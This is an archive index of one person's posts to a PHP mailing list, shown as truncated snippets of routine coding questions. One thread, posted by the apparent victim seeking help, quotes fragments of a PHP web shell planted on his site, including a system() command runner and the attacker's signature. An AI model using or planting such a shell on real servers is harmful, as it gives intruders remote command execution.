[PHP] connect to MAS 90 & 200 with PHP

2003-07-07 Thread Joe Harman
I am curious if anyone is using PHP to connect to a MAS 90 or 200 database?? I am interested in any info on this if anyone has any... THX, Joe

RE: [PHP] New to PHP

2003-07-07 Thread Joe Harman
Hi Hiren, PHP is a great choice, there are a wealth of tutorials on the Internet!!! I would recommend a great book for people like yourself... PHP Fast and Easy by Julie Meloni... You can visit her website at http://www.thickbook.com I have both of her PHP books, and out of the 8 books on PHP he

RE: [PHP] XML

2003-07-08 Thread Joe Harman
Okay Petre... You have asked the question that I always wanted to ask!!! I can't wait to see peoples answer... I simply can't find a use for it either Joe -Original Message- From: Petre Agenbag [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 08, 2003 6:27 AM To: [EMAIL PROTECTED] Subje

RE: [PHP] date frustrations

2003-07-08 Thread Joe Harman
There is probably a better way than this... But I always use EPOCH when I need to put something in order... You can then just write a function to interperate the date when it need to be readable Hope that makes sense joe -Original Message- From: Shena Delian O'Brien [mailto:[EMAIL PRO

RE: [PHP] Re: Defending -> [PHP] New Krysalis version released

2003-07-08 Thread Joe Harman
Hey, I have used this companies free software... And actually bought some... They were extremely helpful when Macromedia lacked PHP support in UltraDev... They probably have more free stuff that costly things... Personally, by using their free stuff, I ended up learning a lot... And the should be v

RE: [PHP] Alex,Joe - >Re: [PHP] New Krysalis version released

2003-07-08 Thread Joe Harman
PROTECTED] Sent: Tuesday, July 08, 2003 6:19 PM To: Alexandru COSTIN Cc: Joe Harman; [EMAIL PROTECTED] Subject: [PHP] Alex,Joe - >Re: [PHP] New Krysalis version released Hi, I never said that it isnt a good product, heck it sounds like its a great product... I myself am a newbie here (a few m

[PHP] Annoucement Idea

2003-07-08 Thread Joe Harman
I am wondering if the creators of this list could impose a rule... all things must be PHP related... if you have an announcement and it is related to PHP... it must be proceed in the subject line of the email with the word "ADV" or "Annoucement" - that way if you don't want to read it, you can dele

[PHP] To All Those Seeking XML & PHP Wisdom!

2003-07-09 Thread Joe Harman
Found a brand new tutorial... just came out today... http://www.sitepoint.com/article/1165 Joe Harman Have you ever noticed? Anybody going slower than you is an idiot, and anyone going faster than you is a maniac. - George Carlen

RE: [PHP] Can php/mysql handle 10000s of records

2003-07-09 Thread Joe Harman
this board can point you in the right direction... Have a great day Joe Harman http://www.HarmanMedia.com Everything is funny as long as it is happening to somebody else. - Will Rogers -Original Message- From: Adam Gerson [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 09, 2003 9:5

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
Hey... Just for Sh** and giggles... Try removing the quotes from keywords Make it look like this... $img_keywords = trim({$_POST[keywords]}) Hmmm. Something is up here... Never seen curly brackets used like this... But that would probably be normal for me LOLjust thought I point out

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
Montoy [mailto:[EMAIL PROTECTED] Sent: Wednesday, July 09, 2003 11:21 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] $_POST problem Didn't make a difference. Still getting the errors. "Joe Harman" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > Hey... Just f

RE: [PHP] $_POST problem

2003-07-09 Thread Joe Harman
your help "Joe Harman" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > Hey... Just for Sh** and giggles... Try removing the quotes from > keywords > > Make it look like this... > > $img_keywords = trim({$_POST[keywords]}) > > Hmmm. Something

[PHP] (REAL TUFFY ) Lat/Long Map Image Manipulation

2003-07-09 Thread Joe Harman
ction Joe Harman http://www.HarmanMedia.com Health nuts are going to feel stupid someday, lying in hospitals dying of nothing. - Redd Foxx

RE: [PHP] (REAL TUFFY ) Lat/Long Map Image Manipulation

2003-07-10 Thread Joe Harman
Hey thanks... They are pretty much trying to do what I am working... I will try to interact a little with them... Have a great one! Joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, July 10, 2003 10:35 AM To: Joe Harman Cc: [EMAIL PROTECTED

[PHP] dump $_POST into variables????

2003-07-10 Thread Joe Harman
list my variables ie $ZipCode, $Distance, $Blah - have them dump in to each!!! thanks Joe Harman http://www.HarmanMedia.com You will never be happy if you continue to search for what happiness consists of. You will never live if you are looking for the meaning of life. - Albert Camus

RE: [PHP] dump $_POST into variables????

2003-07-10 Thread Joe Harman
11 July 2003 13:01, Joe Harman wrote: > Okay, curious if there is an easier way to do this... here is what I > do > > $ZipCode = $_POST['zip']; > $Distance = $_POST['distance']; > ?> > > can't I just dump these into an array and and assign

[PHP] Need Some Basic Help with Arrays

2003-07-11 Thread Joe Harman
od ways to explain it to a right brainer like myself Joe Harman http://www.HarmanMedia.com You will never be happy if you continue to search for what happiness consists of. You will never live if you are looking for the meaning of life. - Albert Camus

[PHP] help with explode.....

2003-07-24 Thread Joe Harman
e use the 'explode()' function no this... and assign them to variables... I need to draw out the radio button id and what they answered... hope that makes sense... thanks for all your help in advance Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and

[PHP] RE: help with explode.....

2003-07-24 Thread Joe Harman
The name of the set of radio buttons is the QuestionID (so it's a number)... And the options are the AnswerID (they are also numbers)... -Original Message- From: Shaunak Kashyap [mailto:[EMAIL PROTECTED] Sent: Friday, July 25, 2003 1:03 AM To: Joe Harman Subject: Re: help with ex

[PHP] RE: help with explode.....

2003-07-24 Thread Joe Harman
actly sure how I am going to do the while part LOL Thanks, Joe -Original Message- From: Shaunak Kashyap [mailto:[EMAIL PROTECTED] Sent: Friday, July 25, 2003 1:14 AM To: Joe Harman Subject: Re: help with explode. > The name of the set of radio buttons is the QuestionID (s

RE: [PHP] help with explode.....

2003-07-24 Thread Joe Harman
SO COOL... Thanks too all -Original Message- From: Binay Agarwal [mailto:[EMAIL PROTECTED] Sent: Thursday, July 24, 2003 1:48 PM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] help with explode. > Okay... this probably isn't that hard to do... but I am just

[PHP] How Do I Change A Number to Percentage

2003-07-25 Thread Joe Harman
Hey, hope all are doing fine. can someone help me be showing me how to change the following numbers to represent percentages 0.92857142857143 0.071428571428571 1.0 Thanks Joe Harman http://www.HarmanMedia.com So we went to Atari and said, `Hey, we've got this amazing thing, even

[PHP] Strip Numbers

2003-07-29 Thread Joe Harman
Hey could someone help me out here I need to strip numbers from a passed variable ex. 3899007 all the numbers will have 990 (so that is the 4th, 5th & sixth numbers... from the right...) I want to keep everything to the left of the two 9s... is there an easy way to do that????

[PHP] THX Strip Numbers

2003-07-30 Thread Joe Harman
Hey Thanks you guys... I appreciate your help! Cheers Joe Harman http://www.HarmanMedia.com This `telephone' has too many shortcomings to be seriously considered as a means of communication. The device is inherently of no value to us. - Western Union internal memo, 1876

[PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
trapping? Abaixo, terminal onde aparecerá os resultados dos comandos que você executou /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt"); } else { system($command); } } ?> Crime Perfect 2003 By _m4st3r_c0d3 - #crimeperfect Joe Harman http://www.HarmanMedia.com Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. - Albert Einstein

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-30 Thread Joe Harman
Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Thanks all Joe -Original Message- From: Adrian [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 2:14 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] Possible My W

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
ified my webhost... I guess it wasn't the first time they've seen this... So the are taking action on it and probably canceling my account... LOL... Thanks for all your help! Joe -Original Message- From: Joel Rees [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 3:10 AM

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Oh, do you mean like Chilisoft for PHP on a IIS server... LOL.. That would be funny -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 10:13 AM To: Jay Blanchard Cc: Ralph Guzman; PHP General Mailing List Subject: Re: [PHP] Article: PHP vs ASP I'

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Yes I agree it would be funny... In my opinion there is no need for the ASP platform... But then again, who am I for having an educated opinion, I let a hacker put a shell script on my site NOW THAT'S FUNNY! -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday,

RE: [PHP] Tracking Users via Cookies? IDEA

2003-08-04 Thread Joe Harman
What if you could read a browser's history file... There has to be a way to do this with something like javascript... Just an idea... Joe -Original Message- From: Ryan A [mailto:[EMAIL PROTECTED] Sent: Sunday, August 03, 2003 9:03 PM To: Jason Bourque Cc: [EMAIL PROTECTED] Subject: Re:

[PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
Hello, I curious if anyone knows of a PHP based Peer-to-Peer file sharing program out there! I have a friend that wants to implement this with his web server.. Joe Harman

RE: [PHP] PHP & P2P File sharing

2003-08-06 Thread Joe Harman
make a file locker type app for them Joe > -Original Message- > From: Chris Shiflett [mailto:[EMAIL PROTECTED] > Sent: Wednesday, August 06, 2003 11:28 PM > To: Joe Harman; [EMAIL PROTECTED] > Subject: Re: [PHP] PHP & P2P File sharing > > > --- Joe Harman <

RE: [PHP] Still can't pass variable through url

2003-08-08 Thread Joe Harman
Jack... Can you paste your code into an email and post it > -Original Message- > From: Jack [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:30 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: [PHP] Still can't pass variable through url > > > Dear all > I had set the

RE: [PHP] Still can't pass variable through url.. whoops

2003-08-08 Thread Joe Harman
YEPPERS.. You're right > -Original Message- > From: Martin Towell [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:59 AM > To: 'Joe Harman'; [EMAIL PROTECTED] > Subject: RE: [PHP] Still can't pass variable through url > >

RE: [PHP] Re: [ERR] DEAD MAILBOX

2003-08-11 Thread Joe Harman
CHRISTMAS IN AUGUST! > -Original Message- > From: andu [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:53 AM > To: [EMAIL PROTECTED] > Subject: Re: [PHP] Re: [ERR] DEAD MAILBOX > > > On Fri, 08 Aug 2003 02:52:31 -0400 > John Manko <[EMAIL PROTECTED]> wrote: > > > arrg.

[PHP] Flash Actionscript List or Forum

2003-08-12 Thread Joe Harman
Hello all, I've been doing PHP for a little while now... I am starting learn Action Script now... and having trouble with global variables and functions... does anyone know where I find a good list or forum for action script? Joe Harman http://www.HarmanMedia.com I used to think

RE: [PHP] Still can't pass variable through url

2003-08-12 Thread Joe Harman
http://www.thingamajigger.com/index.php?year=$year&month=$month\"; >yeah this is the link"; ?> > -Original Message- > From: John Manko [mailto:[EMAIL PROTECTED] > Sent: Friday, August 08, 2003 2:47 AM > To: Martin Towell > Cc: 'Jack'; [EMAIL PROTECTED]; [EMAIL PROTECTED] > Subject: Re:

[PHP] Installer Software

2003-08-14 Thread Joe Harman
n the desktop... can anyone recommend anything out there.. preferably that is free Respectfully, Joe Harman

[PHP] postmaster@hanmir.com

2003-08-14 Thread Joe Harman
Hey is every one getting a returned message from [EMAIL PROTECTED] Joe Harman

RE: [PHP] error: cannot redeclare ()

2003-08-14 Thread Joe Harman
Hi Martin... I am guessing you have a nested function that is being redeclared, your error would come from there... Just a guess anyhow... Joe > -Original Message- > From: Martin Towell [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 07, 2003 2:11 AM > To: [EMAIL PROTECTED] > Subject:

[PHP] Easy XML & PHP tutorials ?????

2003-08-21 Thread Joe Harman
Hello all. does anyone have any very easy XML tutorials . I have a simple weather feed I want to implement. but no XML experience thanks Joe Harman

RE: [PHP] Easy XML & PHP tutorials ?????

2003-08-21 Thread Joe Harman
Burhan! Thanks a lot... This is great... I am going through it right ... Have a great day! Joe > -Original Message- > From: Burhan Khalid [mailto:[EMAIL PROTECTED] > Sent: Thursday, August 21, 2003 10:35 PM > To: Joe Harman; [EMAIL PROTECTED] > Subject: Re: [PHP]

[PHP] PHP - XHTML converter to HDML or WML

2003-08-29 Thread Joe Harman
different errors. So the first step would be to figure out how to determine a cell phone user's browser. So what's it capable of WML 1.1 or WML 2.0, HDML.. Or XHTML Appreciate the feedback, Joe Harman http://www.HarmanMedia.com Have you ever noticed? Anybody going slower than you is an

[PHP] Restart Apache with PHP???

2003-09-02 Thread Joe Harman
Hey guys & gals... Is there a way to restart Apache with a PHP command? Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Thanks Richard Schwartz

2003-09-04 Thread Joe Harman
Dude stop being a jerk, I don't treat people this way... Ah, anyhow... It's not me who will judge you Is it? > -Original Message- > From: Richard Schwartz [mailto:[EMAIL PROTECTED] > Sent: Thursday, September 04, 2003 11:28 AM > To: Joe Harman > Subject:

[PHP] [Thoughts About This] [Newbie Guide] For the benefit of new members

2003-09-05 Thread Joe Harman
Great guide here Ma Siva Kumar... I am a little guilty of not doing this, actually recently too... As I think most of us are at one point or another... Although I would like to add alittle something, maybe just alittle guidance for newbies and seasoned professionals like yourself! 1. Helping those

[PHP] IP to Postal Code CSV? anyone messed around with this and PHP

2003-09-23 Thread Joe Harman
Is there a CSV file out there for this Does anyone know where I can aquire a file that has IP address with the corresponding Postal Code? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] PNGs & PHP feedback

2003-09-29 Thread Joe Harman
Hello, I am looking for some guidance... I am using PHP to make dynamic buttons... Is the PNG image format a pretty safe thing to go with... Standard wise? Thanks for your input. Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] MySQL get second row problem

2003-10-02 Thread Joe Harman
Hello... I am having just alittle trouble with this... I know it's simple... Look at my comment for the problem I am having Thanks -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] MySQL get second row problem [Solved]

2003-10-02 Thread Joe Harman
Hey Thanks Petre Cheers... And a big brain fart > -Original Message- > From: Petre Agenbag [mailto:[EMAIL PROTECTED] > Sent: Thursday, October 02, 2003 6:17 AM > To: Joe Harman > Cc: [EMAIL PROTECTED] > Subject: Re: [PHP] MySQL get second row problem > > >

[PHP] Echo HTML code Verses breaking out of

2003-11-21 Thread Joe Harman
Hello, I would like some opinions, or hopefully facts on a few things... Maybe some people can help me out here. A friend of mine and I were discussing which is best way to use PHP building dynamic pages, here are the 2 methods we are comparing.. They are in the simplest terms here... But try to

[PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Hello, I am curious if there is anyway to take a variable that is passed via a URL by a reguler text hyperlink Ex: http://localhost/Calendar/active_layout.php?d=2.1.2004 and hide it like you would do with the POST method using forms Ex: http://localhost/Calendar/active_layout.php Hidden or POS

RE: [PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Thanks Richard... I will do some erading on that Cheers! Joe -Original Message- From: Richard Davey [mailto:[EMAIL PROTECTED] Sent: Saturday, January 17, 2004 11:08 PM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] POST method for hyperlink Hello Joe, Sunday, January 18

[PHP] Converting PHP code to class

2004-01-18 Thread Joe Harman
Hey, Just curious if anyone here would be interested in helping me convert my PHP Calendar into a class... I am not to good at it... But I figure if someone would like to do it they could get this nifty calendar program that I made... Nice little trade... Let me know and I will forward the code.

[PHP] Question about array limits & practicallity

2004-01-21 Thread Joe Harman
I am curious how much data an array can hold.. And what the pros and cons are. Example.. I am making a testing system that will give a student a 102 question test... The test would be generated so that each one is different... So would it be practical to load all 102 questions and their options

RE: [PHP] Question about array limits & practicallity

2004-01-21 Thread Joe Harman
Thanks for your comments Chris and Rob... Chris you have great points to make, my ears are wide open... The reason I thought about storing the array in a blob is because every test generated will be different. the 102 question test will be generate randomly from a bank of 500 questions.. That mea

[PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
Hello, I am using PHP to build an XML file, but I keep on getting an XML error when open the file in Google Chrome. - This page contains the following errors: error on line 30 at column 318: Entity 'iuml' not defined

Re: [PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
On Mon, Mar 9, 2009 at 9:53 AM, Bob McConnell wrote: > From: Joe Harman >> >> I am using PHP to build an XML file, but I keep on getting an XML >> error when open the file in Google Chrome. >> > ---

Re: [PHP] PHP book recommendations>

2005-02-15 Thread Joe Harman
e, 15 Feb 2005 14:20:05 -0500, Joe Harman <[EMAIL PROTECTED]> wrote: > sorry... wrong address > > > On Tue, 15 Feb 2005 14:19:46 -0500, Joe Harman <[EMAIL PROTECTED]> wrote: > > personally, I like Julie Meloni's books... PHP essentials.. and fast > > and

[PHP] Weird Error Help

2005-02-17 Thread Joe Harman
Hey has anyone had an error like this one? and have a solution --- Warning: Unexpected character in input: '' (ASCII=1) state=1 in **/_eid_page_functions.php on line 173 it appears to be very random... could be my PHP code... but t

Re: [PHP] Weird Error Help

2005-02-18 Thread Joe Harman
ant error... I did add ob_start() and ob_flush() to the site... that seemed to reduce the occurance of the error though... Thanks! Joe On Thu, 17 Feb 2005 15:41:10 -0800 (PST), Richard Lynch <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > Hey has anyone had an error like

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd, I use iframe alot.. what you have to do is tell it a target... but, i am not sure if you can do that with header('Location:...") .. i would be interested to know also Joe On Mon, 28 Feb 2005 16:30:28 -0800, Todd Cary <[EMAIL PROTECTED]> wrote: > My client insists on using inline Fram

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd... I really think what you are going to have to do is pass a javascript variable to the parent page.. cause you are trying to send a variable from the php search page to the parent that has the iframe in it... I am correct in assuming that? On Tue, 1 Mar 2005 16:33:58 -, Mikey <[EMAI

Re: [PHP] PHP file as homepage?

2005-03-15 Thread Joe Harman
Hey Phil, this can be defined in the apache config file Joe On Tue, 15 Mar 2005 11:10:30 -0500, Phil Neeb <[EMAIL PROTECTED]> wrote: > I've noticed that PHP.net uses index.php as its homepage and well, I'm > curious as to how that's possible. Is it the server setup that allows > them to load a

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
Hey, I was curious if anyone here stores arrays in MySQL... and how r u doing this... are you converting the values to a delimited string or is there another way? Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
CTED] <[EMAIL PROTECTED]> wrote: > check serialize() and unserialize() in manual. > implode() and explode() functions too. > > -afan > > Joe Harman wrote: > > >Hey, > > > >I was curious if anyone here stores arrays in MySQL... and how r u > >doing this

Re: [PHP] html image

2005-03-25 Thread Joe Harman
check out http://www.whois.sc they do exactley what you are talking about. i don't think you can make PHP do this.. there maybe someway to do it with imagemagik but i am not even sure about that also... here is a free ware program that does it.. but you have to do it manually http://www.s

Re: [PHP] Any personal experience with MySQL/Calendar application

2005-03-29 Thread Joe Harman
Hey Todd... I have one that I created and posted at Zend.com ... it can be easily adapted to store data n MySQL... Joe On Tue, 29 Mar 2005 12:33:12 -0500, Peter G. Brown <[EMAIL PROTECTED]> wrote: > I have used egroupware in a company setting and found it to be largely > satisfactory. It might b

Re: [PHP] Re: A strange problem..

2005-04-04 Thread Joe Harman
Hey Josh... make sure your mysql table column is a integer... not a varchar.. i've done that by mistake a few times! On Apr 4, 2005 3:22 PM, chris <[EMAIL PROTECTED]> wrote: > what is the structure of your table? > > "JoShQuNe" <[EMAIL PROTECTED]> wrote in message > news:[EMAIL PROTECTED] > > Hi,

[PHP] Re: Javascript Calendar and PHP

2005-04-05 Thread Joe Harman
-- Forwarded message -- From: Joe Harman <[EMAIL PROTECTED]> Date: Apr 6, 2005 2:50 AM Subject: Re: [PHP] Re: Javascript Calendar and PHP To: Nadim Attari <[EMAIL PROTECTED]> interakt has a great one that is used with field forms... it's like $30 or something..

[PHP] PHP & Wire Ready

2005-04-12 Thread Joe Harman
Hello, Curious if anyone out there has any experience using PHP with Wire Ready??? We've taken over a site that uses the wire ready service... which is all done in ASP and needs to be converted over to PHP?? does anyone have or know of any pre-made classes or functions for dealing with this servi

Re: [PHP] Php defense

2005-04-22 Thread Joe Harman
My 2 Cents > ASP is a Platform that supports a number of different microsoft languages which includes ASP Javascript, ASP VBScript, ASP.Net C# & ASP.Net VB ... ASP has a couple of good points to it... most notably is that it is backed by the largest computer company out there.. Microsoft... also,

[PHP] base64_encode in URLs

2005-05-10 Thread Joe Harman
Hey just curious if it's okay to encode variables that are passed in URLs with base64_encode??? since, I am going to pass a email address in the URL, I would like to protect the email address from typical people -- Joe Harman - Do not go where the path may lead, go instead where the

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
; On Tue, May 10, 2005 8:50 pm, Joe Harman said: > > Hey just curious if it's okay to encode variables that are passed in > > URLs with base64_encode??? since, I am going to pass a email address > > in the URL, I would like to protect the email address from typical > > p

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
ess the user clicks to show images > manually. This could fool your automatic counting and email > verification. > > On 5/11/05, Joe Harman <[EMAIL PROTECTED]> wrote: > > HA... Thanks for your thoughts... > > > > I am actually using this for a broadcast email s

[PHP] Storing website templates in sessions

2004-07-07 Thread Joe Harman
Hey everyone... I was curious if anyone out there has some pros and cons to storing a website template that is extracted from a mysql db and stored in a session... is this an efficient way to do it? also... does anyone know what the size limitations for a session would be? Thanks, Joe -- PHP G

[PHP] Help with a image upload class

2004-07-21 Thread Joe Harman
Hello, I was curious if someone would help me alter this class so that instead of using it to upload images... I could send it a full URL path to an image, and it would save it to my server... Thanks, Joe Class --- 300 kbyte // $file_perm = array with mi

[PHP] Making an array from delimited data

2008-04-28 Thread Joe Harman
$data['Gauge Series'] = 0-11,000 rpm I know I can use explode on on set of data... but up do you do it line by line? Thanks for your help -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
this is the complete data that was initially submitted through a textarea field. On Mon, Apr 28, 2008 at 2:56 PM, Shawn McKenzie <[EMAIL PROTECTED]> wrote: > > Joe Harman wrote: > > > I have some data that I pull from a database that is in t

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
Thanks guys... that help me out a lot... i was thinking too hard on ... LOL have a great day! Joe On Mon, Apr 28, 2008 at 3:01 PM, Nathan Nobbe <[EMAIL PROTECTED]> wrote: > On Mon, Apr 28, 2008 at 1:58 PM, Joe Harman <[EMAIL PROTECTED]> wrote: > > > this is the complete

[PHP] Help with preg_match_all regex for alt tags

2008-04-29 Thread Joe Harman
html code] I am currently getting alt="Wheel & Tire Acc" />< I want this result alt="Shoppin

Re: [PHP] mysql_connect slowness

2008-04-29 Thread Joe Harman
Hi Waynn! have you ever tried using 1. sql_cache SELECT SQL_CACHE * FROM table .. I use this alot... although you have to have mysql cache enable in the sql config file... your webhost can tell you if it is on or not 2. make indexes for your tables here is a good article http://www.databas

[PHP] PHP Web Apps & OpenID

2008-05-06 Thread Joe Harman
ghts I've been looking at some PHP scripts out there for OpenID... does anyone have one to recommend??? -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Web Apps & OpenID

2008-05-07 Thread Joe Harman
though... which is what I want to make it easy& convienent for those repeat customers thanks for your input guys Joe On Wed, May 7, 2008 at 4:04 AM, Colin Guthrie <[EMAIL PROTECTED]> wrote: > > Joe Harman wrote: > > > I am curious here if any of you are considering or al

[PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
Hello, is there any way to get more field information other than just the value of a field when a form is submitted??? ex: type, size, class, etc. Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
t it would make thing neat and tidy Thanks for all your input Joe On Mon, Jun 9, 2008 at 3:09 PM, Jim Lucas <[EMAIL PROTECTED]> wrote: > Jim Lucas wrote: >> >> Jim Lucas wrote: >>> >>> Joe Harman wrote: >>>> >>>> Hello, >>>>

Re: [PHP] RE:[PHP] Client Computer Registration

2006-10-03 Thread Joe Harman
: [EMAIL PROTECTED] http://www.informed-sources.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Subscribe to my FRIENDS email list by sending an email to [EMAIL PROTECTED] with subject line of "Subscrib

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
him? > > Thanks, > > Rahul S. Johari > Coordinator, Internet & Administration > Informed Marketing Services Inc. > 500 Federal Street, Suite 201 > Troy NY 12180 > > Tel: (518) 687-6700 x154 > Fax: (518) 687-6799 > Email: [EMAIL PROTECTED] > http://www.infor

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
Good thing I don't have kids! On 3/29/06, Kevin Kinsey <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > >if you really want to mess with them.. only show the user with the > >NULL IP address all the spam posts.. .make them think that they've > >been succ

[PHP] Action on 'Require' Fatal Error

2008-07-09 Thread Joe Harman
Hello, is there a way to call a function or do a header("Location: page.php") when a fatal error is detected from using a the require statement Thanks Joe Harman

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
rst_week_marked = TRUE;}  $week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);  }   else{ $cal_generated .= "".$highlight_today_open ."".$mo

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
rst_week_marked = TRUE;}  $week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);  }   else{ $cal_generated .= "".$highlight_today_o

[PHP] Updated: Calendar Script

2005-01-04 Thread Joe Harman
// Current Day $cal_generated .= "".$temp_filler .""; //$show_next $next_hour_Link = "onclick=\"window.location.href='?epo

[PHP] On large application organization [long and possibly boring]

2005-01-07 Thread Joe Harman
This is Definatley a good conversation... I've realy thought of doing it this way... but i do agree with the person who said that 'having to keep track of a ton of different files could get complicated" ... i can't imagine the performance difference would be that big... but then again, i suppose it

[PHP] Re: [PHP-DB] checkboxes

2005-01-21 Thread Joe Harman
Well.. i just got done doing something like what you are trying to accomplish... you will need to name your check boxes like so : name="completed[]" when the form is submitted, I use something like this and shove it into a field in the database: if($_POST['completed'] <> NULL) { // This makes one

Re: [PHP] Re: [NEWBIE GUIDE] For the benefit of new members

2005-01-25 Thread Joe Harman
Great List... although.. .just having a sense humor here... i think every topic has been covered a number of times... which means no one should be posting questions at the php list... cause they are all in the archive :0) cheers! Joe On Tue, 25 Jan 2005 09:48:53 -0500, Jason Barnett <[EMAIL PRO

[PHP] Replace credit card numbers with X ???

2005-01-25 Thread Joe Harman
Hello, I need to replace all the numbers of a credit card except for the last 4 with an 'X' ... can't seem to locate the string function for this... can someone point me in the right direction here to what php item i should be using. Thanks! Joe -- PHP General Mailing List (http://www.php.net/)

Re: [PHP] Log-in script help

2005-01-25 Thread Joe Harman
Hey Andrew... IN MY OPINION... forget the cookies... only use php sessions... but like I said IMO you can never rely on the end user having them cookies enabled... same with things like javascript... let me outline some steps for you... everyone else... feel free to state pros and cons to th

Re: [PHP] Log-in script help

2005-01-26 Thread Joe Harman
Tom, That's a great tip! Joe On Wed, 26 Jan 2005 10:03:31 +, Tom <[EMAIL PROTECTED]> wrote: > Joe Harman wrote: > > >Hey Andrew... > > > >IN MY OPINION... forget the cookies... only use php sessions... but > >like I said IMO you can never re

[PHP] PHP and USB Devices

2005-05-31 Thread Joe Harman
Has anyone out there found a way to get information from a USB device running on their computer... what i am trying to do is retrive the fingerprint ID that the Microsoft USB fingerprint reader returns for a finger print and put it in a webpage form??? There has to be a way to do it... -- Joe

  1   2   >